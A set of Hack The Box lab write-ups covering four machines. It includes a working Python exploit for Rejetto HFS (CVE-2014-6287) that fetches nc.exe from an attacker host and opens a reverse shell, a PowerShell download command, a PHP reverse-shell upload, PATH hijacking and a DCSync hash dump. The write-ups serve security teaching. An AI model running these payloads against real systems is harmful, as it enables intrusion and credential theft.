Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.129.82.32
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/19 12:48:53 Starting gobuster
===============================================================
/admin (Status: 301)
/swfobject.js (Status: 200)
===============================================================
2021/01/19 12:49:18 Finished
===============================================================
```

Taking a look at the admin directory (via the browser), we see the default config page for Pi-hole.

![](pics/admin_website.png)

Pi-hole is a Linux network-level advertisement and Internet tracker blocking application which acts as a DNS sinkhole and optionally a DHCP server, intended for use on a private network.

## Gaining an Initial Foothold

As Pi-holes are usually installed on a Raspberry Pi, I tried to log in as the default user via SSH (pi:raspberry). And it worked!

```
pi@raspberrypi:~ $ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi)
```

## Privilege Escalation

We also see that pi is in the sudo group.

```
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
```

So gaining a root shell is also very easy:

```
pi@raspberrypi:~ $ su -
Password: raspberry

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

root@raspberrypi:~# id
uid=0(root) gid=0(root) groups=0(root)
```

So basically we have pwned the machine. At least that's what I thought. When trying to read the root flag it states:

```
root@raspberrypi:~# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
```

Hm ok...
Let's inspect the various filesystems on the machine to see if we can find something interesting: 100 | 101 | ``` 102 | root@raspberrypi:~# df -h 103 | Filesystem Size Used Avail Use% Mounted on 104 | aufs 8.5G 2.8G 5.3G 34% / 105 | tmpfs 100M 4.8M 96M 5% /run 106 | /dev/sda1 1.3G 1.3G 0 100% /lib/live/mount/persistence/sda1 107 | /dev/loop0 1.3G 1.3G 0 100% /lib/live/mount/rootfs/filesystem.squashfs 108 | tmpfs 250M 0 250M 0% /lib/live/mount/overlay 109 | /dev/sda2 8.5G 2.8G 5.3G 34% /lib/live/mount/persistence/sda2 110 | devtmpfs 10M 0 10M 0% /dev 111 | tmpfs 250M 8.0K 250M 1% /dev/shm 112 | tmpfs 5.0M 4.0K 5.0M 1% /run/lock 113 | tmpfs 250M 0 250M 0% /sys/fs/cgroup 114 | tmpfs 250M 8.0K 250M 1% /tmp 115 | /dev/sdb 8.7M 93K 7.9M 2% /me 116 | ``` 117 | 118 | We see the filesystem /dev/sdb which has been mounted on /media/usbstick. A USBSTICK! That's what we are looking for. 119 | 120 | ``` 121 | root@raspberrypi:/media/usbstick# ls 122 | damnit.txt lost+found 123 | root@raspberrypi:/media/usbstick# cat damnit.txt 124 | Damnit! Sorry man I accidentally deleted your files off the USB stick. 125 | Do you know if there is any way to get them back? 126 | 127 | -James 128 | ``` 129 | 130 | Hmm... So what now? Maybe we are lucky and the files are deleted but not yet overwritten. A further assumption is, that the flag is a human readable string as in the other challenges. If so, we can try to run `strings` on `/dev/sdb` to see if the flag is still in memory. 131 | 132 | ``` 133 | root@raspberrypi:~# strings /dev/sdb 134 | >r & 135 | /media/usbstick 136 | lost+found 137 | root.txt 138 | damnit.txt 139 | >r & 140 | >r & 141 | /media/usbstick 142 | lost+found 143 | root.txt 144 | damnit.txt 145 | >r & 146 | /media/usbstick 147 | 2]8^ 148 | lost+found 149 | root.txt 150 | damnit.txt 151 | >r & 152 | 3d3e483143ff12ec505d026fa13e020b 153 | Damnit! Sorry man I accidentally deleted your files off the USB stick. 154 | Do you know if there is any way to get them back? 
155 | -James 156 | ``` 157 | 158 | There it is! A suspicious string that looks like a flag. Let's try to submit it ... And it works! Machine pwned! 159 | 160 | 161 | 162 | -------------------------------------------------------------------------------- /Mirai/pics/admin_website.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Mirai/pics/admin_website.png -------------------------------------------------------------------------------- /Mirai/pics/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Mirai/pics/logo.png -------------------------------------------------------------------------------- /Oopsie/README.md: -------------------------------------------------------------------------------- 1 | # Starting Point - Oopsie 2 | 3 | ## Enumeration 4 | ``` 5 | rustscan 10.10.10.28 -- -sC -sV 6 | 7 | PORT STATE SERVICE REASON VERSION 8 | 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 9 | 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) 10 | | http-methods: 11 | |_ Supported Methods: GET HEAD POST OPTIONS 12 | |_http-server-header: Apache/2.4.29 (Ubuntu) 13 | |_http-title: Welcome 14 | ``` 15 | 16 | ### Examine Port 80 - Apache server 17 | 18 | ![website](pics/apache_website.png) 19 | 20 | It seems to be a website for the electric vehicle manufacturer MegaCorp (which we also had in the previous Task "Archetype"). 21 | 22 | ![login_hint](pics/hint_login.png) 23 | 24 | Scrolling down the website, we find a hint for a login page. As the website UI does not provide any login functionality, we have probably have to find it first. Therefore, we open Burpsuite and check the sitemap of the website. 
Alternatively we could also use a tool like `gobuster`or `dirbuster` for this as well. 25 | 26 | ![sitemap](pics/burpsuite_sitemap.png) 27 | 28 | The sitemap reveals that there is a directory called `/cdn-cgi/login/` and the related `/cdn-cgi/login/index.php`. 29 | 30 | ![login_page](pics/login_page.png) 31 | 32 | Opening this file via the webbrowser, we can confirm that this is a login page. 33 | 34 | The next step is to bruteforce the username/password and hope that it is weak. However, using `Hydra` or `Burpsuite Intruder` led to nothing, as the username/password combiniation is unfortunately not included in a common wordlist like `rockyou.txt`. I was pretty much stuck at this point and after a while, I looked it up in a writeup. The password is `MEGACORP_4dm1n!!` (from the previous challenge ... never would have thought of that) and a weak username. 35 | 36 | ![logged_in](pics/logged_in.png) 37 | 38 | Once logged in, we have full access (as we are admin) to the Repair Management System website. 39 | 40 | ![accoun](pics/accounting.png) 41 | 42 | We have access to the account information of the admin (Access ID: 34322, Name: admin, Email: admin@megacorp.com) 43 | 44 | ![branding](pics/branding.png) 45 | 46 | We have information about the Branding. 47 | 48 | ![clients](pics/clients.png) 49 | 50 | As well as information about clients. 51 | 52 | ![uploads](pics/uploads.png) 53 | 54 | But when we try to access the `Uploads`, it says we require super admin rights. Hmmm .... 55 | 56 | After investigating all the source code and the network communication, I realized that when logging in as admin, two cookies are being set. 57 | 58 | ![](pics/cookies.png) 59 | 60 | 1) `user=34322; expires=Sat, 30-Jan-2021 14:17:15 GMT; Max-Age=2592000; path=/` 61 | 2) `role=admin; expires=Sat, 30-Jan-2021 14:17:15 GMT; Max-Age=2592000; path=/` 62 | 63 | So apparently, the user- and role-management is done via plaintext cookies. Great idea! (sarcasm off). 
Perfect chance for us to gain super admin privileges. I quickly realized that the `user=34322` part seemed familiar. We have seen that number before on the admin's account info page: it's the Access ID of the admin.

![accounts_uri](pics/accounts_uri.png)

Going back to the account info page, I realized that there is an `id` parameter in the URL. `id=1` seems to be the admin. Can we get information about the super admin user if we can guess its id? Let's try that.

We have several options for that:

1) Burp Suite Intruder (Sniper)
2) Hydra
3) Writing a script (requesting the URLs and checking the content)

![burpsuite_sniper](pics/burpsuite_sniper.png)

With Burp Suite it's fairly easy to do. Simply intercept the request to the account info page, send it to the Intruder, select `Sniper` and mark the `id` value as the position to be brute-forced. After that, set the payload type to Numbers with a range of integers (e.g. 0-1000).

However, I decided to practice my Python skills and write my own script for that.

```python
import requests

# Account-info page; the id is appended below. It is an IDOR: the id is not tied to the session.
url = "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id="

print("[+] Starting the process")

payload = {
    'username': 'admin',
    'password': 'MEGACORP_4dm1n!!'
}

with requests.Session() as s:
    # Log in once; the session object keeps the user/role cookies for all following requests
    p = s.post('http://10.10.10.28/cdn-cgi/login/index.php', data=payload)
    for x in range(1000):
        print(f"[+] Testing id: {x}")
        test_url = url + str(x)
        res = s.get(test_url)
        # Crude match: assumes the super admin's account page contains the word "super"
        if 'super' in res.text:
            print(f"[+] SUPER ADMIN ID FOUND: {x}")
            break

print("[+] Stopping the process")
```

Running the code tells us that the super admin ID is 30, as the response contains the word `super` (this obviously only works because I've assumed that "super" is somewhere contained in the response.
If that were not the case, the script wouldn't work and I would have to go through each request manually, check for other words, or find a regex to match the account id.)

![super_admin_info](pics/super_admin_info.png)

Looking at the page with the `id` parameter set to 30, we can see the account info of the super admin user. The access ID is `86575`. We change our cookie accordingly and now try to access the `Uploads` page. It works!

![uploads_page](pics/uploads_page.png)

Trying to upload a PHP reverse shell called `shell.php` succeeds.

![shell_upload](pics/upload_shell.png)

During our sitemap enumeration with Burp Suite, we found a directory called `/uploads`. It probably contains the uploaded file.

![shell](pics/shell.png)

Starting a listener on port 4444 with `nc -lvnp 4444` and then accessing the file at `10.10.10.28/uploads/shell.php` gives us a reverse shell to the machine.

The first step is always to stabilize the shell, so that we don't accidentally close the connection if we press something like CTRL+C.

To fully stabilize the shell and enable features like autocomplete, we can do the following:
```
python3 -c 'import pty; pty.spawn("/bin/bash")'

CTRL + Z (to put the nc process into the background)

stty raw -echo; fg
```

Now you should have a fully stabilized shell.

## On-Machine Enumeration

### Other home directories

```
www-data@oopsie:/home$ ls -la
total 12
drwxr-xr-x  3 root   root   4096 Jan 23  2020 .
drwxr-xr-x 24 root   root   4096 Jan 27  2020 ..
drwxr-xr-x  5 robert robert 4096 Feb 25  2020 robert
```
Inspecting the home directories, we can see another user called `robert`. His home directory contains the `user.txt` flag.
| f2c74ee8db7983851ab2a96a44eb7981 |

### Files with SUID

```
www-data@oopsie:/$ find / -perm -u=s -type f 2>/dev/null | grep -v "snap"
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping
/bin/su
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/newuidmap
/usr/bin/passwd
/usr/bin/at
/usr/bin/bugtracker        <-- seems suspicious
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo
```

`-perm -u=s`: only files whose SUID bit is set

`-type f`: only show regular files

`2>/dev/null`: discard error messages (permission denied on directories we cannot read)

`grep -v snap`: remove all findings that contain snap (avoids a lot of noise)

```
www-data@oopsie:/$ ls -la /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 /usr/bin/bugtracker
```
The binary is SUID root, but it is only executable by root and by members of the `bugtracker` group. As `www-data` we have no access to it, so this is a dead end for now (but worth remembering in case we get hold of a user in that group).

### Check www-data files of the website

We should probably check out the other files of the website. Maybe we have missed something. And indeed! There is a `db.php` file containing credentials for the user `robert`, whom we've already found.

```
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
```

So let's try to gain access to the user `robert` (`su robert` from our www-data shell) with the password `M3g4C0rpUs3r!`. And it works!
```
robert@oopsie:/var/www/html/cdn-cgi/login$ id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
```

Robert is also a member of the `bugtracker` group, so we can now further investigate the `bugtracker` binary.

Running the binary with input `1` outputs the following:
```
robert@oopsie:/var/www/html/cdn-cgi/login$ bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 1
---------------

Binary package hint: ev-engine-lib

Version: 3.3.3-1

Reproduce:
When loading library in firmware it seems to be crashed

What you expected to happen:
Synchronized browsing to be enabled since it is enabled for that site.

What happened instead:
Synchronized browsing is disabled. Even choosing VIEW > SYNCHRONIZED BROWSING from menu does not stay enabled between connects.
```

Let's try some weird input like a negative number:

```
robert@oopsie:/var/www/html/cdn-cgi/login$ bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: -1
---------------

cat: /root/reports/-1: No such file or directory
```

So it basically just appends our input to the string `/root/reports/` and hands the result to `cat`, without validating it. Since the binary runs as root, a path traversal lets it print `root.txt` for us:

```
robert@oopsie:/var/www/html/cdn-cgi/login$ bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: ../root.txt
---------------

af13b0bee69f8a877c3faf667f7beacf
```
There we go. We pwned the machine.
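The same defect and its fix, modelled in Python as an added example (this is not the bugtracker source, which we never see; the `/root/reports/` prefix and the `cat` call are what the error message revealed): the unchecked concatenation, a validated variant that refuses anything but a numeric id and proves the resolved path stays inside the reports directory, and a small model of the `PATH` lookup that a relative `cat` goes through, which is what the post-exploitation section turns into a root shell.

```python
import os

# Added example, not the bugtracker source. REPORTS_DIR and the command layout follow
# what the binary revealed ("cat: /root/reports/-1: No such file or directory").
REPORTS_DIR = "/root/reports"


def vulnerable_command(bug_id: str) -> str:
    """What the SUID binary effectively builds and passes to system().

    Two defects: the bug id is concatenated unchecked (path traversal), and `cat`
    is a relative name resolved through the caller's PATH (binary planting).
    """
    return "cat " + REPORTS_DIR + "/" + bug_id


def safe_report_path(bug_id: str, reports_dir: str = REPORTS_DIR) -> str:
    """Allow-list the id, then verify the resolved path is still inside reports_dir."""
    if not bug_id.isdigit():
        raise ValueError(f"bug id must be numeric, got {bug_id!r}")
    base = os.path.realpath(reports_dir)
    path = os.path.realpath(os.path.join(base, bug_id))
    # Independent second check: even if the allow-list above is relaxed one day,
    # a path that resolves outside the base directory is still rejected.
    if os.path.commonpath([base, path]) != base:
        raise ValueError(f"{path} escapes {base}")
    return path


def safe_command(bug_id: str) -> list:
    """argv for subprocess.run(argv, shell=False): absolute binary, validated path."""
    return ["/bin/cat", safe_report_path(bug_id)]


def hijackable_dirs(path_env: str, command: str, existing: set, writable: set) -> list:
    """Directories on PATH that the low-privileged user can write to and that are
    searched before the directory holding the real `command`.

    Pure model so it runs anywhere: `existing` is the set of files that exist,
    `writable` the set of directories the user may write to.
    """
    result = []
    for directory in path_env.split(":"):
        if os.path.join(directory, command) in existing:
            break  # the real binary is found here; later directories are never consulted
        if directory in writable:
            result.append(directory)
    return result


if __name__ == "__main__":
    print(vulnerable_command("../root.txt"))
    print(safe_command("1"))
    try:
        safe_command("../root.txt")
    except ValueError as exc:
        print("rejected:", exc)
    # With /tmp prepended, the fake cat in /tmp shadows /bin/cat for the SUID binary.
    print(hijackable_dirs("/tmp:/usr/local/bin:/usr/bin:/bin", "cat",
                          existing={"/bin/cat"}, writable={"/tmp"}))
```

A SUID binary cannot be fixed by validation alone; it should also use an absolute path (or avoid `system()` entirely and read the file itself) and never inherit the caller's `PATH`.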
## Post Exploitation

For the next challenge we need FTP credentials, which are stored in root's FileZilla configuration, `/root/.config/filezilla/filezilla.xml`. The relevant entries are the host `10.10.10.46`, port `21`, user `ftpuser` and password `mc@F1l3ZilL4`:

```
root@oopsie:/root/.config/filezilla# more filezilla.xml
10.10.10.46
21
0
0
ftpuser
mc@F1l3ZilL4
1
0
MODE_DEFAULT
0
Auto
0
```

Either "guess" this well-known filename and read it through the same traversal (`../.config/filezilla/filezilla.xml` as the Bug ID), or extend the privilege escalation to a full root shell as follows:

As we know that the bugtracker binary runs `cat <filename>` through the shell using a relative command name, we can simply plant our own `cat` earlier in `PATH`:

```
export PATH=/tmp/:$PATH

cd /tmp && echo '/bin/bash' > cat && chmod +x cat
```

Now when executing the `bugtracker` binary, we get a root shell. If the shell that comes back is still `robert`, the binary only raised the effective uid and bash dropped it again; put `/bin/bash -p` into the fake `cat` instead, so that bash keeps the effective uid.
-------------------------------------------------------------------------------- /Optimum/README.md: --------------------------------------------------------------------------------

![](pics/logo.png)

# Optimum (Windows)

## Enumeration

```
rustscan --ulimit 5000 10.129.1.127 -- -sC -sV -o port_scan

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

Looking at the open port 80 via the browser, we see the following page:

![](pics/website.png)

The server is hosting Rejetto HTTP File Server (HFS) version 2.3. Doing some research shows that this specific version has a well-known remote command execution vulnerability (CVE-2014-6287).

## Exploitation

This version of the file server uses a library `ParserLib.pas`, which contains a vulnerable function `findMacroMarker`:

```
function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
```

*"Rejetto HFS versions 2.3, 2.3a, and 2.3b are vulnerable to remote command execution due to a regular expression in parserLib.pas that fails to handle null bytes. Commands that follow a null byte in the search string are executed on the host system."* (https://www.kb.cert.org/vuls/id/251276)

Such a command must be written in the HFS scripting (macro) language format.
E.g. a command can be executed by requesting:

```
http://localhost:80/?search=%00{.exec|<command>.}
```

The null byte terminates the string as far as the regex-based marker search is concerned, so the macro markers after it are never neutralised, and the HFS template engine then evaluates the `{.exec|...}` macro with the rights of the HFS process.

To abuse the vulnerability, I used the script below (it is a Python 2 script, as it uses `urllib2`; you might have to execute it several times). You also need to start an HTTP server from which the script's VBS stage downloads `nc.exe`: the download URL is `http://<ip_addr>/nc.exe` without a port, so the server has to listen on port 80 (e.g. `sudo python3 -m http.server 80` in the directory holding `nc.exe`). A `nc -lvnp 4444` listener catches the reverse shell.

```python
# Python 2 (urllib2). Usage: python2 exploit.py <target-ip> <target-port>
import urllib2
import sys

try:
    # Stage 1: {.save|<path>|<content>.} writes a VBS downloader to C:\Users\Public\script.vbs
    def script_create():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

    # Stage 2: {.exec|cscript.exe ...\script.vbs.} runs it; the VBS fetches nc.exe from our HTTP server
    def execute_script():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

    # Stage 3: {.exec|nc.exe -e cmd.exe <ip> <port>.} connects back to our listener
    def nc_run():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

    ip_addr = "10.10.14.26"  # local IP address (attacker)
    local_port = "4444"      # local port number (nc listener)
    # URL-encoded VBS: GET http://<ip_addr>/nc.exe via Microsoft.XMLHTTP and save it as C:\Users\Public\nc.exe
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save = "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe = "exec|" + vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20" + ip_addr + "%20" + local_port
    exe1 = "exec|" + vbs3
    script_create()
    execute_script()
    nc_run()
except Exception:
    print """[.]Something went wrong..!
    Usage is :[.]
    python2 exploit.py <target-ip> <target-port>
    Don't forget to change the local IP address and port number in the script"""

```

If everything is set up correctly, we can run the script and receive a reverse shell:

```
C:\Users\kostas\Desktop>whoami
whoami
optimum\kostas
```

Instead of using this script, the vulnerability can also be exploited manually by creating a PowerShell reverse shell (watch e.g. `Ippsec`: https://www.youtube.com/watch?v=kWTnVBIpNsE).

A Metasploit exploit module is also available (`exploit/windows/http/rejetto_hfs_exec`).


## Privilege Escalation

Now that we have access to the server, we can look for a way to escalate our privileges. Therefore, we copy the `systeminfo` output to our local machine and use `Windows-Exploit-Suggester` (https://github.com/AonCyberLabs/Windows-Exploit-Suggester) to identify possible vulnerabilities.

Going through the list, I stumbled upon this vulnerability: https://www.exploit-db.com/exploits/41020, MS16-098 ([Details](https://sensepost.com/blog/2017/exploiting-ms16-098-rgnobj-integer-overflow-on-windows-8.1-x64-bit-by-abusing-gdi-objects/), [Binary](https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe)).

As `wget` and `curl` are both not available for our current user, we have to use PowerShell to fetch the exploit binary from our HTTP server:

```
PowerShell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.26/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"
```

Afterwards, we can run the exploit to obtain SYSTEM privileges. The version banner `6.3.9600` (Windows 8.1 / Server 2012 R2) is exactly the build this exploit targets:

```
C:\Users\Public\Downloads>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\Public\Downloads>whoami
whoami
nt authority\system
```

## Post-Exploitation

User Flag
```
type user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73
```

Root Flag

```
type root.txt
51ed1b36553c8461f4552c2e92b3eeed
```

-------------------------------------------------------------------------------- /Pathfinder/README.md: --------------------------------------------------------------------------------

# Starting Point - Pathfinder

## Enumeration

```
PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2021-01-04 22:00:22Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?
syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49671/tcp open  msrpc         syn-ack Microsoft Windows RPC
49676/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         syn-ack Microsoft Windows RPC
49683/tcp open  msrpc         syn-ack Microsoft Windows RPC
49698/tcp open  msrpc         syn-ack Microsoft Windows RPC
49718/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows
```

There are many ports open! Port 88 is typically associated with Kerberos and port 389 with LDAP; together with the domain name `MEGACORP.LOCAL` in the LDAP banner and WinRM on port 5985, this indicates that the host is a Domain Controller.

## Preparation
Using the credentials we obtained in a previous machine, `sandra:Password1234!`, we can attempt to enumerate Active Directory. We can achieve this using BloodHound. There is a Python BloodHound ingester (`bloodhound-python`).
It can be installed using pip: `pip install bloodhound`

Then run (the password is `Password1234!`, exclamation mark included, so it has to be quoted for the shell):
```
python3 -m bloodhound -d megacorp.local -u sandra -p 'Password1234!' -gc pathfinder.megacorp.local -c all -ns 10.10.10.30
```
This will store several JSON files in the current directory, which will later be imported into BloodHound.

The next step is to install `neo4j`, the open source graph database BloodHound uses as its backend.
```
$ sudo apt install neo4j
$ sudo neo4j console
```
Afterwards go to `localhost:7474`, connect to the database with the default credentials `neo4j:neo4j` and change the password.

The last step is to install BloodHound. BloodHound is an application developed with one purpose: to find relationships within an Active Directory (AD) domain to discover attack paths.

Run it with:

```
sudo bloodhound --no-sandbox
```

It will open a GUI and ask you for the database credentials you set up when configuring neo4j.

Then, upload all the JSON files into BloodHound.

## Analysis

BloodHound offers several pre-built analysis queries.

![](pics/bloodhound-analysis.png)

Choosing "Find Principals with DCSync Rights", we can see that `svc_bes` has `GetChangesAll` privileges on the domain. This means that the account can request replication data from the domain controller (a DCSync) and obtain sensitive information such as the password hashes of all users.

![](pics/bloodhound_output.png)

## Exploitation

It's worth checking whether Kerberos pre-authentication has been disabled for this account, which would make it vulnerable to AS-REP roasting: without pre-authentication the KDC hands an AS-REP to anyone who asks, and its encrypted part is keyed only with the user's password hash, so it can be attacked offline. We can check this using a tool such as Impacket's GetNPUsers.

```
$ python3 GetNPUsers.py megacorp.local/svc_bes -request -no-pass -dc-ip 10.10.10.30
Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc_bes
$krb5asrep$23$svc_bes@MEGACORP.LOCAL:d71a0a828dafb52440d7161c2a46d29c$7eaf00d192586f0c3aa80e8ae980e7e6428c71df4fde76885a5da8aa39cf4a21b0ed392d15a22147d50b3bed445a655de8b3aebe5cd7ecb07a94faad74ed5000c14ec727d5e932ac30cf9fc634ee62d1340088f3cac2c944617c502a7845334cccb9f73129b03e4ca2c7caa95d05475e33ad467bc2faa440976b56484b6ecfa053dce6ce430bceb3517ac5a68a5139eea944bf83581c04a9be9b154a480461b5cfff2e87bb9a322262d3a48116eba863a77ad8da1497a6b1aa353e66fdfce21af5db3a5e972f95516ddce0b05c287338258ed73c4b1cef7dde5fd02b7e750cb7e745a1707e11b4e636a04fdc896586db
```

We obtain the AS-REP for `svc_bes` (Impacket prints it in the `$krb5asrep$23$...` format: the first 16 bytes are the HMAC-MD5 checksum, the rest is the RC4 ciphertext) and save it to a file called `hash`. Now we have to crack it with a tool such as `john`:

```
$ sudo john hash -w=/usr/share/wordlists/rockyou.txt
[sudo] password for ctf:
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
Sheffield19      ($krb5asrep$23$svc_bes@MEGACORP.LOCAL)
1g 0:00:00:26 DONE (2021-01-04 15:23) 0.03743g/s 396967p/s 396967c/s 396967C/s Sheffwed1..Sheethead?
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

It is now possible to access the server as `svc_bes` over WinRM (port 5985) with the cracked password `Sheffield19`, and grab user.txt:

```
evil-winrm -i 10.10.10.30 -u svc_bes -p Sheffield19
```

The user.txt is located on svc_bes's Desktop: `b05fb166688a8603d970c6d033f637f1`

## Privilege Escalation
In order to leverage the `GetChangesAll` permission, we can use Impacket's secretsdump.py to perform a DCSync attack (asking the DC for replication data over DRSUAPI, exactly as another domain controller would) and dump the NTLM hashes of all domain users.

```
$ python3 secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30
Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:4daaf43d62196be359323e580d7d1a22:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
Administrator:aes128-cts-hmac-sha1-96:5235da455da08703cc108293d2b3fa1b
Administrator:des-cbc-md5:f1c89e75a42cd0fb
krbtgt:aes256-cts-hmac-sha1-96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
krbtgt:aes128-cts-hmac-sha1-96:02abd84373491e3d4655e7210beb65ce
krbtgt:des-cbc-md5:d0f8d0c86ee9d997
svc_bes:aes256-cts-hmac-sha1-96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
